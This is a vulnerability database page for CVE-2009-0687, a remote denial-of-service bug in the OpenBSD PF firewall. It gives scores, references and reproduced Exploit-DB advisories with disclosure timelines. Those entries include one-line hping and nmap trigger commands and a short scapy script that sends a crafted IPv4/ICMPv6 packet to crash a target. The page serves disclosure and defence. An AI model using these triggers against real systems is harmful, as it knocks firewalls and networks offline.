CVE-2009-0687 : Detail

CVE-2009-0687

7.06%V3
Network
2009-08-11
08h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The pf_test_rule function in OpenBSD Packet Filter (PF), as used in OpenBSD 4.2 through 4.5, NetBSD 5.0 before RC3, MirOS 10 and earlier, and MidnightBSD 0.3-current allows remote attackers to cause a denial of service (panic) via crafted IP packets that trigger a NULL pointer dereference during translation, related to an IPv4 packet with an ICMPv6 payload.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.8 AV:N/AC:L/Au:N/C:N/I:N/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 8581

Publication date : 2009-04-29 22h00 +00:00
Author : Rembrandt
EDB Verified : Yes

_ _ _____ _ ___ _____ _ _ / / / / ____/ / / _/_ __/ / / / / /_/ / __/ / / / / / / / /_/ / / __ / /___/ /____/ / / / / __ / /_/ /_/_____/_____/___/ /_/ /_/ /_/ Helith - 0815 -------------------------------------------------------------------------------- Author : Rembrandt Date : 2009-04-30 Found : 2009-04-09 Affected Software: PF (OpenBSD Packet Filter) Affected OS : OpenBSD 4.2 up to 4.5 and HEAD branch up to 2009-04-11 NetBSD 5.x up to RC3 and HEAD branch up to 2009-04-13 MirOS #10 and earlier MidnightBSD 0.3-current Not affected OS : FreeBSD NetBSD 3.x, 4.x, 5.x (patched before release) DragonflyBSD Debian GNU/kFreeBSD MidnightBSD prior 0.3 Older versions of OpenBSD PF and products based thereon might be affected as well. The Bug was introduced between the OpenBSD 4.1 and 4.2 release. Type : Denial of Service OSVDB : 53608 Milw0rm : 8406 CVE : ISS X-Force: : BID : 34482 Secunia : 34676 VUPEN ID : ADV-2009-1015 This advisory supercedes the original advisory which was just related to OpenBSD because we had to publish an announcement in response to OpenBSD's reaction. Trying to fix it responsibly and get in contact with the vendor: -- OpenBSD -- Contacted 2009-04-09 16:35 UTC Patch available 2009-04-11 23:43 UTC We received no response nor a notification about an upcoming patch. Also we had no chance to coordinate or inform other projects before OpenBSD issued the patch and a statement. We like to mention that the issued patch is just a workaround and does not patch or remove the affected code. -- NetBSD -- Contacted and asked for confirmation 2009-04-15 06:00 UTC Were informed about further investigations 2009-04-15 9:42 UTC Received information about upcoming Patches 2009-04-15 11:57 UTC Received confirmation for 5.x up to RC3 and HEAD 2009-04-15 12:17 UTC We thank the NetBSD team that they patched the PF bug prior the 5.x release! -- FreeBSD -- Contacted and asked for confirmation 2009-04-15 06:56 UTC Were informed about further investigations 2009-04-15 7:56 UTC Were informed about not being vulnerable 2009-04-15 22:05 UTC -- DragonflyBSD -- Contacted and asked for confirmation 2009-04-15 06:10 UTC Were informed about not being vulnerable 2009-04-15 21:35 UTC -- MirOS (MirBSD) -- Contacted and asked for official confirmation 2009-04-15 06:36 UTC Received confirmation for MirBSD 10 and prior 2009-04-15 17:57 UTC -- MidnightBSD -- Contacted and asked for official confirmation 2009-04-15 20:17 UTC Received confirmation for MidnightBSD 2009-04-15 22:37 UTC -- Debian GNU/kFreeBSD -- Contacted and asked for official confirmation 2009-04-15 22:41 UTC Were informed about not being vulnerable 2009-04-15 23:35 UTC -- END -- OpenBSDs PF firewall is prone to a remote Denial of Service due to a NULL- pointer dereference when handling special crafted IP datagrams. If the firewall handles such a packet the kernel panics. An example for such a packet would be a IPv4 packet with a ICMPv6 payload. This affects multiple vendors because PF was incorporated into serveral OS. The problem stems from the unification of the rule processing in pf_test_rule(). With this unification ICMPv6 logic was applied to IPv4 packets and vice versa. Because the handling logic asserts that the common code in pf_test has verified that the packet contains a full ICMP header and has pulled up the mbuf up to that point. This assertion fails when the wrong AF-version is used by pf_test and thus pf_test_rule tries to access not allocated memory. The affected function is in pf_change_a6 and the patch is just a workaround because it filters the packet in pf_test() except of fixing the affected source code. Steps to reproduce: If you have an affected OS in your network which does NAT or redirecting traffic you should be able to test your IPv4 device with this simple hping command: hping -0 -H 58 $a_host Patches are provided for: OpenBSD 4.3 - 4.5 (not for 4.2), HEAD after 2009-04-11 NetBSD 4.x (patched for consistency) - 5.0RC3, HEAD after 2009-04-13 MirBSD 10 MidnightBSD 0.3-current Workaround: The OpenBSD developers provide hints for a workaround at their errata website too. We like to thank the security teams of the following projects for their friendly cooperation: DragonflyBSD NetBSD FreeBSD MidnightBSD MirBSD Special thanks goes to Andreas Bogk who assisted in the assembly analysis and Adrian Portelli of the NetBSD project for his time and permanent suggestions. Kind regards, Rembrandt # milw0rm.com [2009-04-30]
Exploit Database EDB-ID : 8430

Publication date : 2009-04-13 22h00 +00:00
Author : nonroot
EDB Verified : Yes

import sys from scapy import * victim=sys.argv[1] icmpv6=58 p=IP(dst=victim) p.proto=icmpv6 sr(p,timeout=1) # milw0rm.com [2009-04-14]
Exploit Database EDB-ID : 8406

Publication date : 2009-04-12 22h00 +00:00
Author : Rembrandt
EDB Verified : Yes

_ _ _____ _ ___ _____ _ _ / / / / ____/ / / _/_ __/ / / / / /_/ / __/ / / / / / / / /_/ / / __ / /___/ /____/ / / / / __ / /_/ /_/_____/_____/___/ /_/ /_/ /_/ Helith - 0815 -------------------------------------------------------------------------------- Author : Rembrandt Date : 2009-04-09 Affected Software: OpenBSD Kernel Affected OS : OpenBSD 4.{3,4,5}, OpenBSD-current Propably older versions are affected as well Type : Denial of Service OSVDB : Milw0rm : CVE : ISS X-Force: : BID : Secunia : 34676 VUPEN ID : Trying to fix it responsible and get in contact with the vendor: -- OpenBSD -- Contacted 2009-04-09 15:35 GMT+1 Patch avaiable 2009-04-11 23:43 UTC We received no response nor a notification about an upcoming patch by the developers. -- END -- OpenBSDs PF firewall in OpenBSD 4.3 up to OpenBSD-current is prone to a remote Denial of Service during a null pointer dereference in relation with special crafted IP datagrams. If the firewall handles such a packet the kernel panics. Steps to reproduce: If you are behind a OpenBSD firewall this nmap scan should trigger the problem and crash your firewall device: nmap -sO $some_host_so_that_the_firewall_handles_the_packets For more informations please do read the patch issued by OpenBSD. Patches and Workaround: Patches are provided for OpenBSD 4.3, 4.4, 4.5 (upcoming, release 1st of may) and OpenBSD-current (via CVS only) and are avaiable at the errata website. The developers provide hints for a workaround at their errata website too. Kind regards, Rembrandt # milw0rm.com [2009-04-13]

Products Mentioned

Configuraton 0

Midnightbsd>>Midnightbsd >> Version 0.3-current

    Mirbsd>>Miros >> Version To (including) 10

      Netbsd>>Netbsd >> Version 5.0

        Openbsd>>Openbsd >> Version 4.2

        Openbsd>>Openbsd >> Version 4.3

        Openbsd>>Openbsd >> Version 4.4

        Openbsd>>Openbsd >> Version 4.5

        References

        http://www.osvdb.org/53608
        Tags : vdb-entry, x_refsource_OSVDB
        http://www.openbsd.org/errata43.html#013_pf
        Tags : vendor-advisory, x_refsource_OPENBSD
        https://www.exploit-db.com/exploits/8406
        Tags : exploit, x_refsource_EXPLOIT-DB
        http://www.securityfocus.com/archive/1/502634
        Tags : mailing-list, x_refsource_BUGTRAQ
        https://www.exploit-db.com/exploits/8581
        Tags : exploit, x_refsource_EXPLOIT-DB
        http://www.openbsd.org/errata44.html#013_pf
        Tags : vendor-advisory, x_refsource_OPENBSD
        http://www.vupen.com/english/advisories/2009/1015
        Tags : vdb-entry, x_refsource_VUPEN
        http://www.openbsd.org/errata45.html#002_pf
        Tags : vendor-advisory, x_refsource_OPENBSD